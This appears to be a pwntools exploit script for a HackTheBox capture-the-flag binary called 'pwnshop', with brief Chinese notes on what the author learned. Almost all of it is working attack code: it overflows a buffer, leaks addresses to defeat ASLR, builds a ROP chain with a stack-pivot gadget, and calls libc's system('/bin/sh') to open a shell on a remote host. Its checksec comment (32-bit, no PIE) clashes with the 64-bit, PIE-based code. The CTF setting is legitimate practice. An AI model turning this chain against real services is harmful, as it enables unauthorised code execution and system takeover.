#!/usr/bin/env python

# -*- coding: utf-8 -*-

# This exploit template was generated via:

# $ pwn template --host 167.99.88.212 --port 31369 space

from pwn import *

from pwnlib import libcdb

# Set up pwntools for the correct architecture

exe = context.binary = ELF('/root/hackthebox/tracker/pwnshop')

# Many built-in settings can be controlled on the command-line and show up

# in "args".? For example, to dump all data sent/received, and disable ASLR

# for all created processes...

# ./exploit.py DEBUG NOASLR

# ./exploit.py GDB HOST=example.com PORT=4141

host = args.HOST or '46.101.23.188'

port = int(args.PORT or 30327)

def local(argv=[], *a, **kw):

? ? '''Execute the target binary locally'''

? ? if args.GDB:

? ? ? ? return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)

? ? else:

? ? ? ? return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):

? ? '''Connect to the process on the remote host'''

? ? io = connect(host, port)

? ? if args.GDB:

? ? ? ? gdb.attach(io, gdbscript=gdbscript)

? ? return io

def start(argv=[], *a, **kw):

? ? '''Start the exploit against the target.'''

? ? if args.LOCAL:

? ? ? ? return local(argv, *a, **kw)

? ? else:

? ? ? ? return remote(argv, *a, **kw)

def leakdataaddr():

? ? io.sendlineafter("> ","2")

? ? io.sendlineafter("sell? ",b'zzq')

? ? io.sendafter("it? ",b'11111111')

? ? ret = io.recvline()

? ? #what? 11111111

? ? start=14

? ? #%s?

? ? end=ret.index(b'?',start)

? ? addr=ret[start:end]

? ? addr_int=int.from_bytes( addr, byteorder='little')

? ? data_segment=addr_int-0xc0

? ? print(hex(data_segment))

? ? return data_segment

def leakputsaddr():

? ? io.sendlineafter("> ","1")

? ? payload = b'a'*0x28

? ? payload += p64(pop_rdi_ret)

? ? payload += p64(puts_got)

? ? payload += p64(puts_plt)

? ? payload += p64(loop_addr)

? ? payload += p64(sub_rsp_ret)

? ? io.sendafter("details: ",payload)

? ? ret=io.recvline()

? ? ret=ret[0:-1]

? ? puts_addr=int.from_bytes( ret, byteorder='little', signed=False)

? ? print(hex(puts_addr))

? ? return puts_addr

def getshell():

? ? io.sendlineafter("> ","1")

? ? payload = b'a'*0x28

? ? payload += p64(pop_rdi_ret)

? ? payload += p64(str_binsh_addr)

? ? payload += p64(system_addr)

? ? payload += b'a'*0x8

? ? payload += p64(sub_rsp_ret)

? ? io.sendlineafter("details: ",payload)

? ? sleep(1)

? ? io.interactive()

? ? print('aa')

# Specify your GDB script here for debugging

# GDB will be launched if the exploit is run via e.g.

# ./exploit.py GDB

gdbscript = '''

tbreak main

continue

'''.format(**locals())

#===========================================================

#? ? ? ? ? ? ? ? ? ? EXPLOIT GOES HERE

#===========================================================

# Arch:? ? i386-32-little

# RELRO:? ? No RELRO

# Stack:? ? No canary found

# NX:? ? ? NX disabled

# PIE:? ? ? No PIE (0x8048000)

# RWX:? ? ? Has RWX segments

io = start()

data_addr=leakdataaddr()

entry_addr=data_addr-0x4000

exe.address=entry_addr

main_addr = 0x10A0+entry_addr

buy_addr = 0x132A+entry_addr

loop_addr = 0x10BD+entry_addr

#sub rsp, 0x28 ; ret

sub_rsp_ret=0x1219 + entry_addr

pop_rdi_ret=0x13c3 + entry_addr

puts_plt=exe.plt['puts']

puts_got=exe.got['puts']

puts_addr=leakputsaddr()

puts_offset=0x6f6a0

libc_addr=puts_addr-puts_offset

system_addr = 0x453a0 + libc_addr

str_binsh_addr= 0x18ce17 + libc_addr

getshell()

這題難度沒那么高，卻暴露知識盲點(diǎn)

只有buy()函數(shù) 8bytes ret地址的overwrite，一個(gè)單位地址，不能直接在stack上寫rop

1.ROPgadget ，用--only'sub|ret' 找不到 sub rsp,xxx gadgets，不加 --only，默認(rèn)返回所以的gadgets。

2.開始想用ret2dlresolve，把dlresolve寫進(jìn)數(shù)據(jù)段，后面發(fā)現(xiàn)payload有0x50，代碼限制只能寫0x40。

3.還是sendline()月send造成的困惑，leakputsaddr（）多寫一個(gè)\n，造成getshell()接收字節(jié)出錯(cuò)。